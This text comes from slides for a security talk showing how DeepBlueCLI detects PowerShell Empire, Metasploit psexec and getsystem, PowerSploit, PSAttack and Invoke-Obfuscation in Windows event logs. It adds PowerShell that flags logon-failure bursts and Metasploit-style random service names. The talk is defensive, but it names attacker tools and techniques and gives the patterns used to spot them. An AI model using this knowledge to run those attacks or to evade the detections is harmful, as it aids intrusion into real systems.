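$start  = Get-Date '2016-09-01 10:00:00'
$users  = 'administrator', 'eric', 'backup', 'svc_sql'
$sample = New-Object System.Collections.ArrayList
for ($i = 0; $i -lt 3561; $i++) {
    [void]$sample.Add((New-Object PSObject -Property @{
        Time = $start.AddMilliseconds($i * 15); Account = $users[$i % 4]; Source = '10.0.0.99'; Workstation = 'ATTACKER' }))
}
[void]$sample.Add((New-Object PSObject -Property @{ Time = $start; Account = 'eric'; Source = '10.0.0.12'; Workstation = 'WS12' }))
Get-LogonFailureSummary -Failures $sample -Threshold 100 | Format-List Source, Failures, UniqueAccounts, FirstSeen, LastSeen, Note
```

On a live system replace the constructed list with `Get-LogonFailures` (or `Get-LogonFailures -Path Security.evtx`); the output is one line for 10.0.0.99 with 3561 failures and four accounts, and nothing for the lone typo from 10.0.0.12.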
Use Case: PowerShell Empire (thx @harmj0y and @enigma0x3)

• PowerShell Empire is quite stealthy
• By default: zero Windows events are generated by the launcher.bat payload on the right
• Once enabled: security event 4688 is quite helpful

DeepBlueCLI vs. PowerShell Empire

Use Case: Metasploit psexec

Exploit target: Native upload

Meterpreter getsystem

Attacker then escalated privileges and dumped the hashes:

DeepBlueCLI vs. Metasploit psexec with Native upload

Detection of Metasploit-style service name and Native upload EXE:

DeepBlueCLI also detects use of Meterpreter's "getsystem":

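The "Sunlight" slide gives the ^[A-Za-z]{16}$ regex for Metasploit's default service names, and this slide shows it applied to a psexec native-upload service install. The script below is an added example, not DeepBlueCLI's code: it applies that regex to System log event 7045 ("A service was installed in the system"), which the Service Control Manager writes on every service install. The ServiceName and ImagePath field names are the 7045 event-data names; the check for a random-looking EXE basename in the image path is my own heuristic, not something the slides specify, and the sample records are constructed.

```powershell
# Added example, not DeepBlueCLI's code: apply the ^[A-Za-z]{16}$ service-name regex from the
# "Sunlight" slide to System event 7045. The ImagePath basename check is an added heuristic and
# the sample records are constructed.

$script:RandomName = '^[A-Za-z]{16}$'

function Test-ServiceInstall {
    param([Parameter(Mandatory=$true)][string]$ServiceName, [string]$ImagePath = '')
    $reasons = @()
    if ($ServiceName -match $script:RandomName) {
        $reasons += "Service name matches $($script:RandomName) (Metasploit default)"
    }
    # Native upload drops RandomName.exe; look for the same 16-letter pattern as the EXE basename.
    # A regex is used instead of [IO.Path] so odd image paths (pipes, redirects) cannot throw.
    if ($ImagePath -and $ImagePath -match '\\([A-Za-z]{16})\.exe\b') {
        $reasons += "Image path basename looks random: $ImagePath"
    }
    return ,$reasons
}

function Get-SuspiciousServiceInstalls {
    # Live System log by default; pass -Path to read an exported .evtx instead.
    param([string]$Path)
    $filter = @{ LogName = 'System'; ID = 7045 }
    if ($Path) { $filter = @{ Path = $Path; ID = 7045 } }
    foreach ($e in (Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue)) {
        $data = ([xml]$e.ToXml()).Event.EventData.Data
        $name = ($data | Where-Object { $_.Name -eq 'ServiceName' }).'#text'
        $img  = ($data | Where-Object { $_.Name -eq 'ImagePath' }).'#text'
        if (-not $name) { continue }
        $why = Test-ServiceInstall -ServiceName $name -ImagePath $img
        if ($why.Count -gt 0) {
            New-Object PSObject -Property @{
                Time = $e.TimeCreated; Service = $name; ImagePath = $img; Reason = ($why -join '; ')
            }
        }
    }
}

# Constructed samples: the service name from the slide with a random-looking EXE, and a benign install.
$samples = @(
    @{ Name = 'GWRhKCtKcmQarQUS'; Image = '%SystemRoot%\QeBcXVpuLzTmYrKd.exe' },
    @{ Name = 'Spooler';          Image = '%SystemRoot%\System32\spoolsv.exe' }
)
foreach ($s in $samples) {
    $why = Test-ServiceInstall -ServiceName $s.Name -ImagePath $s.Image
    "$($s.Name): " + $(if ($why.Count -gt 0) { $why -join '; ' } else { 'no findings' })
}
```

The first sample is reported on both counts and the Spooler record is not. Because the slide notes that blocking such names would cause false positives, this stays a detection: the output is something to triage quickly, not a rule to block on.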
Use Case: Metasploit psexec, exploit target PowerShell

DeepBlueCLI vs Metasploit psexec – exploit target PowerShell, system log

DeepBlueCLI vs Metasploit psexec – exploit target PowerShell, security log

Use Case: PowerSploit (thx @mattifestation, @obscuresec and @JosephBialek)

DeepBlueCLI vs PowerSploit

First command used short URL, second used PowerSploit's GitHub site

Use Case: PSAttack (thx @jaredhaight)

PSAttack "…doesn't rely on powershell.exe. Instead it calls powershell directly through the .NET framework. This makes it harder for enterprises to block."
• https://github.com/jaredhaight/PSAttack

DeepBlueCLI vs. PSAttack

DeepBlueCLI detects PSAttack's use of csc.exe (C# Compiler) and cvtres.exe (Resource File To COFF Object Conversion Utility)

Use Case: Invoke-Obfuscation (thx @danielhbohannon)

DeepBlueCLI vs. Invoke-Obfuscation

• Invoke-Obfuscation will be released tomorrow:
• In the meantime, I noticed it used a lot of special characters,
o Specifically the "+" to join the obfuscated strings together
• So I updated DeepBlueCLI
• And I created a POC "exploit"…

DeepBlueCLI vs. Invoke-Obfuscation

• Invoke-Obfuscation will be released tomorrow. In the meantime, I created a POC

DeepBlueCLI: Next Steps

• Next major update will split DeepBlueCLI into two parts:
• Detection engine:
o Outputting to XML or PowerShell Object format
• Reporting engine:
o Inputs results from detection engine
o Output text, XML or CSV
• Also plans to integrate into SOF-ELK

Demo Time!

Thank you!

• Contact me on Twitter:
o @eric_conrad
• Copy of this talk is available at http://ericconrad.com
• Check out Security 511 for more monitoring/operational goodness: http://sec511.com